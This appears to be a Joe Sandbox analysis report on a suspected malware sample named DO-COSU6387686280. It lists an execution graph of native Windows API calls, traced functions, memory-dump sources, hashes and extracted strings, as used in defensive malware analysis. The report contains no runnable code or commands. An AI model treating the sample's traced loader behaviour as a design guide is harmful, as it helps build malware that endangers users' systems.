                                                                                        execution_graph 95115 42c043 95116 42c05d 95115->95116 95119 17d2df0 LdrInitializeThunk 95116->95119 95117 42c085 95119->95117 95120 424d03 95121 424d1f 95120->95121 95122 424d47 95121->95122 95123 424d5b 95121->95123 95124 42ca43 NtClose 95122->95124 95130 42ca43 95123->95130 95126 424d50 95124->95126 95127 424d64 95133 42ec43 RtlAllocateHeap 95127->95133 95129 424d6f 95131 42ca5d 95130->95131 95132 42ca6e NtClose 95131->95132 95132->95127 95133->95129 95134 42fbc3 95135 42fbd3 95134->95135 95136 42fbd9 95134->95136 95139 42ec03 95136->95139 95138 42fbff 95142 42cd53 95139->95142 95141 42ec1e 95141->95138 95143 42cd70 95142->95143 95144 42cd81 RtlAllocateHeap 95143->95144 95144->95141 95182 425093 95186 4250ac 95182->95186 95183 4250f7 95184 42eb23 RtlFreeHeap 95183->95184 95185 425107 95184->95185 95186->95183 95187 425137 95186->95187 95189 42513c 95186->95189 95188 42eb23 RtlFreeHeap 95187->95188 95188->95189 95145 41a843 95146 41a85b 95145->95146 95148 41a8b5 95145->95148 95146->95148 95149 41e7b3 95146->95149 95150 41e7d9 95149->95150 95153 41e8d6 95150->95153 95155 42fcf3 95150->95155 95152 41e874 95152->95153 95161 42c093 95152->95161 95153->95148 95156 42fc63 95155->95156 95157 42ec03 RtlAllocateHeap 95156->95157 95160 42fcc0 95156->95160 95158 42fc9d 95157->95158 95165 42eb23 95158->95165 95160->95152 95162 42c0b0 95161->95162 95171 17d2c0a 95162->95171 95163 42c0dc 95163->95153 95168 42cda3 95165->95168 95167 42eb3c 95167->95160 95169 42cdc0 95168->95169 95170 42cdd1 RtlFreeHeap 95169->95170 95170->95167 95172 17d2c1f LdrInitializeThunk 95171->95172 95173 17d2c11 95171->95173 95172->95163 95173->95163 95174 413d03 95177 42ccc3 95174->95177 95178 42ccdd 95177->95178 95181 17d2c70 LdrInitializeThunk 95178->95181 95179 413d25 95181->95179 95190 414273 95191 41428c 95190->95191 95196 417a73 95191->95196 95193 4142aa 95194 4142f6 95193->95194 95195 4142e3 PostThreadMessageW 95193->95195 95195->95194 95198 417a97 95196->95198 95197 417a9e 95197->95193 95198->95197 95199 417ad3 LdrLoadDll 95198->95199 95200 417aea 95198->95200 95199->95200 95200->95193 95201 41b5b3 95202 41b5f7 95201->95202 95203 41b618 95202->95203 95204 42ca43 NtClose 95202->95204 95204->95203 95205 419038 95206 42ca43 NtClose 95205->95206 95207 419042 95206->95207 95208 4018bc 95210 40185e 95208->95210 95209 4018e1 95210->95208 95210->95209 95213 430093 95210->95213 95216 42e6d3 95213->95216 95217 42e6f9 95216->95217 95228 407423 95217->95228 95219 42e70f 95227 401a4a 95219->95227 95231 41b3c3 95219->95231 95221 42e72e 95224 42e743 95221->95224 95246 42cdf3 95221->95246 95242 4285d3 95224->95242 95225 42e75d 95226 42cdf3 ExitProcess 95225->95226 95226->95227 95230 407430 95228->95230 95249 416723 95228->95249 95230->95219 95232 41b3ef 95231->95232 95260 41b2b3 95232->95260 95235 41b450 95235->95221 95236 41b41c 95237 41b427 95236->95237 95239 42ca43 NtClose 95236->95239 95237->95221 95238 41b434 95238->95235 95240 42ca43 NtClose 95238->95240 95239->95237 95241 41b446 95240->95241 95241->95221 95243 428635 95242->95243 95245 428642 95243->95245 95271 4188e3 95243->95271 95245->95225 95247 42ce10 95246->95247 95248 42ce21 ExitProcess 95247->95248 95248->95224 95250 416740 95249->95250 95252 416759 95250->95252 95253 42d4a3 95250->95253 95252->95230 95255 42d4bd 95253->95255 95254 42d4ec 95254->95252 95255->95254 95256 42c093 LdrInitializeThunk 95255->95256 95257 42d54c 95256->95257 95258 42eb23 RtlFreeHeap 95257->95258 95259 42d565 95258->95259 95259->95252 95261 41b2cd 95260->95261 95265 41b3a9 95260->95265 95266 42c133 95261->95266 95264 42ca43 NtClose 95264->95265 95265->95236 95265->95238 95267 42c14d 95266->95267 95270 17d35c0 LdrInitializeThunk 95267->95270 95268 41b39d 95268->95264 95270->95268 95272 41890d 95271->95272 95278 418e1b 95272->95278 95279 413ee3 95272->95279 95274 418a3a 95275 42eb23 RtlFreeHeap 95274->95275 95274->95278 95276 418a52 95275->95276 95277 42cdf3 ExitProcess 95276->95277 95276->95278 95277->95278 95278->95245 95283 413f03 95279->95283 95281 413f6c 95281->95274 95282 413f62 95282->95274 95283->95281 95284 41b6d3 RtlFreeHeap LdrInitializeThunk 95283->95284 95284->95282 95285 17d2b60 LdrInitializeThunk

                                                                                        Executed Functions

                                                                                        Function 0042CA43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 272 42ca43-42ca7c call 404743 call 42dc93 NtClose
                                                                                        APIs
                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction ID: 5121de7a3503c7c05ab04a2345a93f5a7ea96df4153e346bd077cc8f1e2ea0d1
                                                                                        • Opcode Fuzzy Hash: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction Fuzzy Hash: B6E0DF312042047BC210AF6ADC41FA7735CEBC5318F004429FA0C67141C3B1B90082B4
                                                                                        Function 017D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                                                                        • Instruction ID: cfb84d624313eadea449f7af612ad7d1e430112c05f136dccf16f7d06bc42ec3
                                                                                        • Opcode Fuzzy Hash: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                                                                        • Instruction Fuzzy Hash: 1990026120640003420571584418616808A97E4201B55C031E10145A0DC5258A916226
                                                                                        Function 017D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                                                                        • Instruction ID: 73c6f7c825fda3dcc9f0a932bc53ca62dd8125dc3e94d0048e0ae64d0ee70065
                                                                                        • Opcode Fuzzy Hash: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                                                                        • Instruction Fuzzy Hash: FC90023120540413D21171584508707408997D4241F95C422A0424568DD6568B52A222
                                                                                        Function 017D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                                                                        • Instruction ID: 85804f4409594ef709451d78ba5fdb81f9cc398358337d6c7682427610d4a138
                                                                                        • Opcode Fuzzy Hash: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                                                                        • Instruction Fuzzy Hash: 0D90023120548802D2107158840874A408597D4301F59C421A4424668DC6958A917222
                                                                                        Function 017D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                                                                        • Instruction ID: f3bf2810e9835c5e9833fea3ed9fbbc400c90e70eb677d4a5a61e155de262d52
                                                                                        • Opcode Fuzzy Hash: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                                                                        • Instruction Fuzzy Hash: 9890023160950402D20071584518706508597D4201F65C421A0424578DC7958B5166A3
                                                                                        Function 0041411B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 41411b-414145 2 414191-4141cc 0->2 3 414147 0->3 7 4141e8-414203 2->7 8 4141ce 2->8 3->2 14 414242-414244 7->14 15 414205-414216 7->15 9 4141d0-4141d5 8->9 10 4141d6 8->10 12 4141d7-4141d9 9->12 13 41424c-414253 9->13 10->12 16 414231 12->16 17 4141db 12->17 18 414254 13->18 20 414247 14->20 21 414269-4142e1 call 42ebc3 call 42f5d3 call 417a73 call 4046b3 call 4251d3 14->21 15->18 19 414218-41421a 15->19 22 414264 18->22 19->16 20->22 23 414249 20->23 35 414303-414308 21->35 36 4142e3-4142f4 PostThreadMessageW 21->36 23->13 36->35 37 4142f6-414300 36->37 37->35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 0-2720052585
                                                                                        • Opcode ID: f5d7dea99f021e5480596321c84ecd1adf560e68dc7d3f496d8e7274470f2bd7
                                                                                        • Instruction ID: b245ee9cd471547411f7a075f1619fd49207f3a0982104024940ee06700587fb
                                                                                        • Opcode Fuzzy Hash: f5d7dea99f021e5480596321c84ecd1adf560e68dc7d3f496d8e7274470f2bd7
                                                                                        • Instruction Fuzzy Hash: F041DC35A00248BBC7218F64DC06BDEBB74EFC5720F1441DAE9406B682D37959C6C7D9
                                                                                        Function 00414232 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 38 414232-414245 39 414247 38->39 40 414269-4142e1 call 42ebc3 call 42f5d3 call 417a73 call 4046b3 call 4251d3 38->40 41 414264 39->41 42 414249-414254 39->42 56 414303-414308 40->56 57 4142e3-4142f4 PostThreadMessageW 40->57 42->41 57->56 58 4142f6-414300 57->58 58->56
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 004142F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: 80c9bbe024941fc6e9d360327b0bcd0a035b1dcf475d0bb2f479cfcb765ce6b4
                                                                                        • Instruction ID: 6aff456da46f67235967f719b86724be309bbfe7a69446d3a61f5095063a07e1
                                                                                        • Opcode Fuzzy Hash: 80c9bbe024941fc6e9d360327b0bcd0a035b1dcf475d0bb2f479cfcb765ce6b4
                                                                                        • Instruction Fuzzy Hash: 02213831E0424877DB20AF95DC46FDF7B789F81B40F0440AAFA407B181D678564687D9
                                                                                        Function 00414265 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 004142F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: 0ff9b59d8def7a566c38434cf8956a2603b29af83db27bfd155923ecf35f5dbb
                                                                                        • Instruction ID: d959944df4c13c8b7d7073abce3159c561ad81b10d50f84a5f4fed72dc6520e4
                                                                                        • Opcode Fuzzy Hash: 0ff9b59d8def7a566c38434cf8956a2603b29af83db27bfd155923ecf35f5dbb
                                                                                        • Instruction Fuzzy Hash: E9112931E0421C76DB219BA1CC02FDF7F788F41B50F444055FA007B281D7B8564687EA
                                                                                        Function 00414273 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 004142F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: 57a1ae90571e0264591201ac5941ec86f6baa744345e1fd25880599cc0e98f74
                                                                                        • Instruction ID: 55339ccd5297258ca8b32506814e243f050256aab0b15c1b401c88c68c7f5c3c
                                                                                        • Opcode Fuzzy Hash: 57a1ae90571e0264591201ac5941ec86f6baa744345e1fd25880599cc0e98f74
                                                                                        • Instruction Fuzzy Hash: C401D631E4521C76DB20AB918C02FEF7B7C9F40B54F54815AFE047B2C1D6B85A0687E9
                                                                                        Function 00417A73 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 247 417a73-417a8f 248 417a97-417a9c 247->248 249 417a92 call 42f703 247->249 250 417aa2-417ab0 call 42fd03 248->250 251 417a9e-417aa1 248->251 249->248 254 417ac0-417ad1 call 42e1a3 250->254 255 417ab2-417abd call 42ffa3 250->255 260 417ad3-417ae7 LdrLoadDll 254->260 261 417aea-417aed 254->261 255->254 260->261
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                        • Instruction ID: 951ff610ac39a6f38bbff579b8dd7db04218f0068db2d4cb8e74220fd8362f2d
                                                                                        • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                        • Instruction Fuzzy Hash: 91015EB1E0420DABDF10DBE1DC42FEEB3789F54308F4041AAE90897240F635EB588B95
                                                                                        Function 0042CD53 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 262 42cd53-42cd97 call 404743 call 42dc93 RtlAllocateHeap
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,0041E874,?,?,00000000,?,0041E874,?,?,?), ref: 0042CD92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: c44fcf100cbf6d45f3a0729b41021b003dc96154f87e45996f002ab2b05fb921
                                                                                        • Instruction ID: da1a00f5d2450df82f7efa51f53590ad079933f7a188b0349b84ff491960dae8
                                                                                        • Opcode Fuzzy Hash: c44fcf100cbf6d45f3a0729b41021b003dc96154f87e45996f002ab2b05fb921
                                                                                        • Instruction Fuzzy Hash: 7CE06DB12046147BD610EE59DC45FAB37ADEFC5714F00442AF908A7241D771BD1086B8
                                                                                        Function 0042CDA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 267 42cda3-42cde7 call 404743 call 42dc93 RtlFreeHeap
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,DC37B48D,00000007,00000000,00000004,00000000,004172EC,000000F4), ref: 0042CDE2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: b3ce44d6e26d6fd7bfe7f07135e175846e4c9631d83757d3d1020b48beff1ca4
                                                                                        • Instruction ID: b147ec9044906c2a1533bdb4e691deeb43f16ec49ccf817d03189d8f227b3c82
                                                                                        • Opcode Fuzzy Hash: b3ce44d6e26d6fd7bfe7f07135e175846e4c9631d83757d3d1020b48beff1ca4
                                                                                        • Instruction Fuzzy Hash: 32E09272204204BBD610EE59DC41FEB37ADEFC9714F000419FA0CA7241DB71B9108BB8
                                                                                        Function 0042CDF3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 277 42cdf3-42ce2f call 404743 call 42dc93 ExitProcess
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,EE81EF03,?,?,EE81EF03), ref: 0042CE2A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: 73006a82a9f388035dc7094147ac8d0d510816c94c126f70072e2747e2748d5a
                                                                                        • Instruction ID: 05a22ea77d6511e92e52769d3a8a4e6645a99d3cdb9febb1c2f3f8a2cc6b3e20
                                                                                        • Opcode Fuzzy Hash: 73006a82a9f388035dc7094147ac8d0d510816c94c126f70072e2747e2748d5a
                                                                                        • Instruction Fuzzy Hash: 29E04F752002147BD210AF5AEC41FAB775DDBC5710F10452AFA0867241C7B1B91086E5
                                                                                        Function 017D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 424 17d2c0a-17d2c0f 425 17d2c1f-17d2c26 LdrInitializeThunk 424->425 426 17d2c11-17d2c18 424->426
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2f6c5b22767bc1e4ea76ef666367e96e45b76eb5b30d8c3feaab3835d59e5659
                                                                                        • Instruction ID: ede3efcb15847821485b96005da32eac148b59a4bc1864e67c9726b6bfeae819
                                                                                        • Opcode Fuzzy Hash: 2f6c5b22767bc1e4ea76ef666367e96e45b76eb5b30d8c3feaab3835d59e5659
                                                                                        • Instruction Fuzzy Hash: 96B09B719055C5C5DB12E764460C717B95077D0701F15C071D2070651F4738C5D1E276

                                                                                        Non-executed Functions

                                                                                        Function 01812349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2160512332
                                                                                        • Opcode ID: 139fd6781def6effa5878b9cdf1d57d469c7dd31bbf5c9190f181c589b0d522f
                                                                                        • Instruction ID: e1bacf8b38a67820d74518e9bdd64869a482602da5ce951131a96da8e5f2e9e0
                                                                                        • Opcode Fuzzy Hash: 139fd6781def6effa5878b9cdf1d57d469c7dd31bbf5c9190f181c589b0d522f
                                                                                        • Instruction Fuzzy Hash: C592D072604346AFE721CF28C884F6BB7EABB84714F14482DFA94D7255D770EA44CB92
                                                                                        Function 017C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01805543
                                                                                        • Critical section address, xrefs: 01805425, 018054BC, 01805534
                                                                                        • 8, xrefs: 018052E3
                                                                                        • Critical section address., xrefs: 01805502
                                                                                        • double initialized or corrupted critical section, xrefs: 01805508
                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0180540A, 01805496, 01805519
                                                                                        • Invalid debug info address of this critical section, xrefs: 018054B6
                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054CE
                                                                                        • corrupted critical section, xrefs: 018054C2
                                                                                        • Address of the debug info found in the active list., xrefs: 018054AE, 018054FA
                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054E2
                                                                                        • Critical section debug info address, xrefs: 0180541F, 0180552E
                                                                                        • undeleted critical section in freed memory, xrefs: 0180542B
                                                                                        • Thread identifier, xrefs: 0180553A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                        • API String ID: 0-2368682639
                                                                                        • Opcode ID: 67f8446bee1063cd66766666686bb34d9f72d4b729d5bd0adf8dfdab28a7766b
                                                                                        • Instruction ID: ef3423f94379bdaf2f1f76e6ee547046fc4633622babf4b217fe43e670514bc0
                                                                                        • Opcode Fuzzy Hash: 67f8446bee1063cd66766666686bb34d9f72d4b729d5bd0adf8dfdab28a7766b
                                                                                        • Instruction Fuzzy Hash: B68169B1A40348EEDB61CF99C859BAEFBB5AB08B14F204119F504F7281D3B5AA41CF61
                                                                                        Function 01840274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
